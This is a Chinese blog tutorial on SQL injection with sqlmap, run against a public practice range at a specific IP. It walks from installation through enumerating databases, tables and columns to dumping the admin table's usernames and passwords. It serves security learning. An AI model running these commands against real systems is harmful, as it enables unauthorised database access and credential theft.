【Mac滲透測試】之SQL注入Demo
阿新 • • 發佈:2020-09-17
目錄:
1
一、下載安裝sqlmap
1、官網地址:http://sqlmap.org/#download
git下載:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
2、驗證sqlmap安裝成功:
sqlmap.py -v
二、SQL注入
1、首先網上找到了SQL 注入靶場:http://59.63.200.79:8003/index.php
# 基礎語法 sqlmap.py -u “注入地址” --dbs # 列舉資料庫 sqlmap.py -u “注入地址” --current--db #當前資料庫 sqlmap.py -u “注入地址” --users # 列資料庫使用者 sqlmap.py -u “注入地址” --current--user # 當前使用者 sqlmap.py -u “注入地址” --tables -D “資料庫” # 列舉資料庫的表名 sqlmap.py -u “注入地址” --columns -T “表名” -D “資料庫” # 獲取表的列名 sqlmap.py-u “注入地址” --dump -C “列名字” -T “表名字” -D “資料庫” # 獲取資料庫下表的列資訊
2、檢視是否可以SQL注入:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch
3、檢視資料庫:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --dbs
4、檢視當前使用的資料庫:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --current-db
5、檢視當前資料庫的表:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe --tables
6、檢視admin表的sql欄位列:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin --columns
7、檢視maoshe資料庫、admin表的“password,username”欄位的值:
python sqlmap.py -u "http://59.63.200.79:8003/?id=1" --dump -C "password,username" -T admin -D maoshe